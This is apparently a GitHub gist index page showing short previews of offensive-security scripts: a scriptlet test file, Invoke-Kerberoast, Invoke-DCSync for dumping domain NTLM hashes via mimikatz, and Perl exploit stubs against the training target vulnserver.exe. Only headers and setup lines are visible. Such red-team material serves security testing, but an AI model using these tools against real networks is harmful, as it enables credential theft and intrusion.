Skip to content

Instantly share code, notes, and snippets.

@0xbadjuju
0xbadjuju / test.sct
Last active February 17, 2023 20:55 — forked from bohops/test.sct
.SCT for testing (++++ @subTee)
<?XML version="1.0"?>
<scriptlet>
<registration
description="NetSPI"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
using System;
using System.Collections;
using System.Management;
using System.Management.Instrumentation;
using System.Runtime.InteropServices;
using System.Configuration.Install;
/*
* Added references:
* system.configuration.install
@0xbadjuju
0xbadjuju / Invoke-Kerberoast.ps1
Created June 8, 2017 20:05
Invoke-Kerberoast.ps1
<#
Invoke-Kerberoast.ps1
Author: Will Schroeder (@harmj0y), @machosec
License: BSD 3-Clause
Required Dependencies: None
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast).
Note: the primary method of use will be Invoke-Kerberoast with various targeting options.
@0xbadjuju
0xbadjuju / Parse_Passwords.ps1
Last active July 8, 2020 22:09
Parse_Passwords.ps1
################################################################################
#
################################################################################
function Create-Table
{
param (
[string] $DB_Path
)
$connection = New-Object System.Data.OleDb.OleDbConnection
@0xbadjuju
0xbadjuju / Invoke-DCSync.ps1
Created June 22, 2020 13:25 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
@0xbadjuju
0xbadjuju / Parse-IPsNessus.ps1
Created February 21, 2020 18:56
Parses the IPs from a Nessus scan file
function Parse-IPsNessus
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$True, HelpMessage="File Name")]
[String]$fileName
)
$fileNamePath = Resolve-Path("$fileName")
@0xbadjuju
0xbadjuju / lter2.pl
Created February 14, 2020 18:40
vulnserver.exe LTER 2
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.2.133");
my $port = 9999;
@0xbadjuju
0xbadjuju / lter.pl
Last active February 7, 2020 15:32
vulnserver.exe LTER
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.99.144");
my $port = 9999;
@0xbadjuju
0xbadjuju / gter.pl
Created February 5, 2020 02:31
vulnserver.exe GTER
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.99.144");
my $port = 9999;
@0xbadjuju
0xbadjuju / kstet.pl
Created January 31, 2020 19:00
vulnserver.exe KSTET
#!/usr/bin/perl
use strict;
use warnings;
use Encode qw/encode/;
use Socket;
my $target = inet_aton("192.168.99.144");
my $port = 9999;